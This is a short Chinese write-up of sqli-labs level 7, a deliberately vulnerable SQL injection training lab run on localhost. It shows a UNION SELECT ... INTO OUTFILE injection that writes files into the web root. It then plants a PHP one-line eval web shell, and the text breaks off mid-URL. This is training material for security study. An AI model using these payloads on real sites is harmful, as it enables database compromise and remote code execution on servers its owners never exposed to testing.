sqlilabs第七关
前言
没啥说的,直接开整。
一、解题
我这里直接贴源码,就可以看出啥注入类型
看到源码之后输入?id=1’)) ,显示的页面。
题目也告诉我们outfile,说明他的权限开了。
并且这题的字段,表,数据库都和前面的题一样。
我先随便输入点:?id=1’)) union select 1,2,3 into outfile “D:/phpstudy/WWW/sqli-labs-master/Less-7/1.txt”。
虽然他报错,但在我上传的文件夹里面确实有1.txt。
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,2,3 into outfile "D:/phpstudy/WWW/sqli-labs-master/Less-7/1.txt" %23
下面我们传入一句话木马,输入?id=1’)) union select 1,2,"<?php @eval($_POST['123']);?>" into outfile “D:/phpstudy/WWW/sqli-labs-master/Less-7/1.php” %23。
http: